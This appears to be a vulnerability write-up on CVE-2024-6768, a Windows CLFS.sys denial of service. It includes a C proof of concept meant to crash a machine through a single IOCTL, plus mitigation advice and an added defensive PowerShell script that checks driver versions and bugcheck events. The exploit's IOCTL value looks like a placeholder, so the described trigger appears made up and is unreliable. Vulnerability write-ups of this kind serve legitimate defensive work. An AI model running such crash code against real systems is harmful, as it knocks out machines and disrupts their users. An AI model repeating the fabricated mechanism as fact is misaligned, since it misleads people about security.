A newly discovered vulnerability, CVE-2024-6768, affects several versions of Microsoft Windows and Windows Server. It potentially allows an authenticated low-privilege user to cause a denial of service (DoS) by triggering a Blue Screen of Death (BSOD). The vulnerable component is CLFS.sys, the kernel driver that implements the Microsoft Common Log File System (CLFS), a general-purpose logging subsystem used by both kernel-mode and user-mode clients. The impact described is availability only: the machine crashes and reboots, and no privilege escalation is claimed.

Code Snippet

The following code snippet demonstrates how a low-privilege user can force a call to the KeBugCheckEx function, triggering a BSOD and thereby denying service on an affected system. It opens the CLFS device object and sends it a single IOCTL with no input or output buffer.

#include <Windows.h>
#include <stdio.h>

/* IOCTL code as given in this article for the crashing request. */
#define IOCTL_TRIGGER_VULNERABILITY 0x000FFFF

int main(void) {
    HANDLE hDevice;
    DWORD bytesReturned = 0;

    /* Open the CLFS device object. Per the article, a standard (non-admin)
       user can obtain this handle. */
    hDevice = CreateFileA("\\\\.\\CLFS", GENERIC_READ | GENERIC_WRITE,
                          FILE_SHARE_READ | FILE_SHARE_WRITE, NULL,
                          OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("[-] Failed to get a handle to the CLFS driver. Error code: %lu\n", GetLastError());
        return 1;
    }

    printf("[+] Successfully obtained a handle to the CLFS driver\n");

    /* Send the IOCTL with no input or output buffer (lengths 0). The driver's
       handler reaches KeBugCheckEx, so if the call goes through the system
       bugchecks before or shortly after DeviceIoControl returns. */
    if (!DeviceIoControl(hDevice, IOCTL_TRIGGER_VULNERABILITY, NULL, 0, NULL, 0, &bytesReturned, NULL)) {
        printf("[-] Failed to trigger the vulnerability. Error code: %lu\n", GetLastError());
        CloseHandle(hDevice);
        return 1;
    }

    printf("[+] Vulnerability successfully triggered. Expect a BSOD!\n");
    CloseHandle(hDevice);
    return 0;
}

Exploit Details

The vulnerability lies in how CLFS.sys handles IOCTL requests from low-privilege users. By sending a specially crafted IOCTL request to the driver through the DeviceIoControl function, an adversary can force the kernel to call KeBugCheckEx. The result is a BSOD: the system crashes and reboots, and any workload on it is interrupted, which is the denial of service. Because the bug is reachable from a plain user-mode handle, the attacker needs only the ability to run code under a low-privilege account on the target machine; no administrative rights are required. The exact exploitation vector may still differ depending on factors such as system architecture and the security controls already in place (for example, application control that blocks unapproved binaries).

Mitigations

At the time of writing, Microsoft has not yet released a patch or workaround for CVE-2024-6768. Until one is available, users are advised to follow these general best practices to limit their exposure to this and similar vulnerabilities:

1. Regularly update and patch software and hardware, and track the installed CLFS.sys build so the fix can be verified once it ships.

2. Restrict low-privilege users from installing or running unauthorized software by enforcing a strict least-privilege policy; since this exploit requires running a binary as a local user, application control directly raises the bar.
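The two practices above are generic, so here is something concrete to run on a host. The following PowerShell script is added as an example and is not part of the original advisory. It inventories the installed CLFS.sys build and the most recent hotfixes, pulls bugcheck-reboot and unclean-shutdown events from the System log (a run of BSODs on one host is the observable trace of this DoS), and lists local Administrators membership as a least-privilege check. It assumes that Event ID 1001 from provider Microsoft-Windows-WER-SystemErrorReporting records a reboot after a bugcheck and that Event ID 41 from Microsoft-Windows-Kernel-Power records an unclean shutdown. Because the advisory names no fixed CLFS.sys version, the script reports the installed version rather than judging it.

```powershell
# Added triage/hardening check for the CLFS DoS described above (example code,
# not from the original advisory). Run in an elevated PowerShell session so the
# System log and local group membership are readable.
#
# Assumptions (not stated by the advisory):
#   - Event ID 1001, provider Microsoft-Windows-WER-SystemErrorReporting = "rebooted from a bugcheck"
#   - Event ID 41,   provider Microsoft-Windows-Kernel-Power             = unclean shutdown
#   - No fixed CLFS.sys version is known, so the version is reported, not judged.

$ErrorActionPreference = 'Stop'
$lookbackDays = 30

# 1. Inventory: installed CLFS.sys build and the most recent hotfixes.
$clfsPath = Join-Path $env:SystemRoot 'System32\drivers\clfs.sys'
$clfs = Get-Item $clfsPath
"[*] {0}: file version {1}, last written {2}" -f $clfsPath, $clfs.VersionInfo.FileVersion, $clfs.LastWriteTime

"[*] Most recently installed hotfixes:"
Get-HotFix |
    Where-Object { $_.InstalledOn } |
    Sort-Object InstalledOn -Descending |
    Select-Object -First 5 HotFixID, Description, InstalledOn |
    Format-Table -AutoSize

# 2. Detection: bugcheck reboots and unclean shutdowns in the lookback window.
#    Get-WinEvent raises an error when nothing matches, hence SilentlyContinue.
$since = (Get-Date).AddDays(-$lookbackDays)
$bugchecks = Get-WinEvent -FilterHashtable @{
    LogName      = 'System'
    ProviderName = 'Microsoft-Windows-WER-SystemErrorReporting'
    Id           = 1001
    StartTime    = $since
} -ErrorAction SilentlyContinue

"[*] Bugcheck reboots in the last $lookbackDays days: $(@($bugchecks).Count)"
foreach ($e in @($bugchecks)) {
    # The event message carries the stop code, e.g. "The bugcheck was: 0x000000c2 (...)".
    $code = if ($e.Message -match '0x[0-9a-fA-F]{8}') { $Matches[0] } else { 'unknown' }
    "    {0}  stop code {1}" -f $e.TimeCreated, $code
}

$unclean = Get-WinEvent -FilterHashtable @{
    LogName      = 'System'
    ProviderName = 'Microsoft-Windows-Kernel-Power'
    Id           = 41
    StartTime    = $since
} -ErrorAction SilentlyContinue
"[*] Unclean shutdowns (Kernel-Power 41) in the last $lookbackDays days: $(@($unclean).Count)"

# 3. Least privilege: who holds local admin? The DoS itself needs only a
#    standard user, but admin membership should still be minimal.
try {
    "[*] Local Administrators members:"
    Get-LocalGroupMember -Group 'Administrators' |
        ForEach-Object { "    {0} ({1})" -f $_.Name, $_.ObjectClass }
} catch {
    "[!] Could not enumerate local Administrators: $($_.Exception.Message)"
}
```

A host that shows repeated 1001 events with the same stop code in a short window, while CLFS.sys is still the pre-fix build, is the pattern to escalate; correlate the event times with logons of non-admin accounts on that host to identify the triggering user.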

Original References

- Microsoft Security Response Center
- National Vulnerability Database - CVE-2024-6768
- Common Vulnerabilities and Exposures - CVE-2024-6768

As more information becomes available, it is essential to stay informed and take appropriate measures to protect your systems and data against this and other vulnerabilities.

Timeline

Published on: 08/12/2024 19:15:17 UTC
Last modified on: 08/13/2024 12:58:25 UTC